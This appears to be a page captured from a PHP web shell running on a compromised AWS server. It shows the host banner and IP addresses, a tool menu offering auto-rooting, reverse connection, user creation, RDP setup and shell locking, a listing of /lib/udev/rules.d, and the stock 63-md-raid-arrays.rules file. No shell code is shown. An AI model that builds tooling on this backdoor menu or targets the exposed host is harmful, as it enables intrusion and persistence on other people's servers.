Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 52.14.7.103
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib /
udev /
rules.d /
[ HOME SHELL ]
Name
Size
Permission
Action
01-md-raid-creating.rules
321
B
-rw-r--r--
40-vm-hotadd.rules
655
B
-rw-r--r--
50-apport.rules
165
B
-rw-r--r--
50-firmware.rules
210
B
-rw-r--r--
50-udev-default.rules
3.53
KB
-rw-r--r--
55-dm.rules
7.1
KB
-rw-r--r--
56-lvm.rules
2.39
KB
-rw-r--r--
60-block.rules
620
B
-rw-r--r--
60-cdrom_id.rules
1.05
KB
-rw-r--r--
60-drm.rules
413
B
-rw-r--r--
60-evdev.rules
974
B
-rw-r--r--
60-input-id.rules
282
B
-rw-r--r--
60-open-vm-tools.rules
250
B
-rw-r--r--
60-persistent-alsa.rules
616
B
-rw-r--r--
60-persistent-input.rules
2.65
KB
-rw-r--r--
60-persistent-storage-dm.rules
1.75
KB
-rw-r--r--
60-persistent-storage-tape.rul...
1.47
KB
-rw-r--r--
60-persistent-storage.rules
6.37
KB
-rw-r--r--
60-persistent-v4l.rules
769
B
-rw-r--r--
60-sensor.rules
727
B
-rw-r--r--
60-serial.rules
1.16
KB
-rw-r--r--
61-persistent-storage-android....
456
B
-rw-r--r--
63-md-raid-arrays.rules
2.08
KB
-rw-r--r--
64-btrfs-dm.rules
387
B
-rw-r--r--
64-btrfs.rules
570
B
-rw-r--r--
64-md-raid-assembly.rules
1.41
KB
-rw-r--r--
66-azure-ephemeral.rules
1.91
KB
-rw-r--r--
66-snapd-autoimport.rules
190
B
-rw-r--r--
69-bcache.rules
1.03
KB
-rw-r--r--
69-lvm-metad.rules
4.33
KB
-rw-r--r--
69-md-clustered-confirm-device...
846
B
-rw-r--r--
70-iscsi-network-interface.rul...
226
B
-rw-r--r--
70-joystick.rules
432
B
-rw-r--r--
70-mouse.rules
734
B
-rw-r--r--
70-power-switch.rules
568
B
-rw-r--r--
70-touchpad.rules
473
B
-rw-r--r--
70-uaccess.rules
2.62
KB
-rw-r--r--
71-power-switch-proliant.rules
461
B
-rw-r--r--
71-seat.rules
2.69
KB
-rw-r--r--
73-seat-late.rules
636
B
-rw-r--r--
73-special-net-names.rules
961
B
-rw-r--r--
73-usb-net-by-mac.rules
1.26
KB
-rw-r--r--
75-net-description.rules
452
B
-rw-r--r--
75-probe_mtd.rules
174
B
-rw-r--r--
78-graphics-card.rules
965
B
-rw-r--r--
78-sound-card.rules
4.7
KB
-rw-r--r--
80-debian-compat.rules
1.34
KB
-rw-r--r--
80-drivers.rules
615
B
-rw-r--r--
80-net-setup-link.rules
295
B
-rw-r--r--
85-hdparm.rules
82
B
-rw-r--r--
90-console-setup.rules
265
B
-rw-r--r--
95-dm-notify.rules
479
B
-rw-r--r--
99-systemd.rules
4.26
KB
-rw-r--r--
99-vmware-scsi-udev.rules
433
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 63-md-raid-arrays.rules
# do not edit this file, it will be overwritten on update SUBSYSTEM!="block", GOTO="md_end" # handle md arrays ACTION!="add|change", GOTO="md_end" KERNEL!="md*", GOTO="md_end" # partitions have no md/{array_state,metadata_version}, but should not # for that reason be ignored. ENV{DEVTYPE}=="partition", GOTO="md_ignore_state" # container devices have a metadata version of e.g. 'external:ddf' and # never leave state 'inactive' ATTR{md/metadata_version}=="external:[A-Za-z]*", ATTR{md/array_state}=="inactive", GOTO="md_ignore_state" TEST!="md/array_state", ENV{SYSTEMD_READY}="0", GOTO="md_end" ATTR{md/array_state}=="|clear|inactive", ENV{SYSTEMD_READY}="0", GOTO="md_end" LABEL="md_ignore_state" IMPORT{program}="/sbin/mdadm --detail --export $devnode" ENV{DEVTYPE}=="disk", ENV{MD_NAME}=="?*", SYMLINK+="disk/by-id/md-name-$env{MD_NAME}", OPTIONS+="string_escape=replace" ENV{DEVTYPE}=="disk", ENV{MD_UUID}=="?*", SYMLINK+="disk/by-id/md-uuid-$env{MD_UUID}" ENV{DEVTYPE}=="disk", ENV{MD_DEVNAME}=="?*", SYMLINK+="md/$env{MD_DEVNAME}" ENV{DEVTYPE}=="partition", ENV{MD_NAME}=="?*", SYMLINK+="disk/by-id/md-name-$env{MD_NAME}-part%n", OPTIONS+="string_escape=replace" ENV{DEVTYPE}=="partition", ENV{MD_UUID}=="?*", SYMLINK+="disk/by-id/md-uuid-$env{MD_UUID}-part%n" ENV{DEVTYPE}=="partition", ENV{MD_DEVNAME}=="*[^0-9]", SYMLINK+="md/$env{MD_DEVNAME}%n" ENV{DEVTYPE}=="partition", ENV{MD_DEVNAME}=="*[0-9]", SYMLINK+="md/$env{MD_DEVNAME}p%n" IMPORT{builtin}="blkid" OPTIONS+="link_priority=100" OPTIONS+="watch" ENV{ID_FS_USAGE}=="filesystem|other|crypto", ENV{ID_FS_UUID_ENC}=="?*", SYMLINK+="disk/by-uuid/$env{ID_FS_UUID_ENC}" ENV{ID_FS_USAGE}=="filesystem|other", ENV{ID_FS_LABEL_ENC}=="?*", SYMLINK+="disk/by-label/$env{ID_FS_LABEL_ENC}" ENV{MD_LEVEL}=="raid[1-9]*", ENV{SYSTEMD_WANTS}+="mdmonitor.service" # Tell systemd to run mdmon for our container, if we need it. ENV{MD_LEVEL}=="raid[1-9]*", ENV{MD_CONTAINER}=="?*", PROGRAM="/bin/readlink $env{MD_CONTAINER}", ENV{MD_MON_THIS}="%c" ENV{MD_MON_THIS}=="?*", PROGRAM="/usr/bin/basename $env{MD_MON_THIS}", ENV{SYSTEMD_WANTS}+="mdmon@%c.service" LABEL="md_end"
Close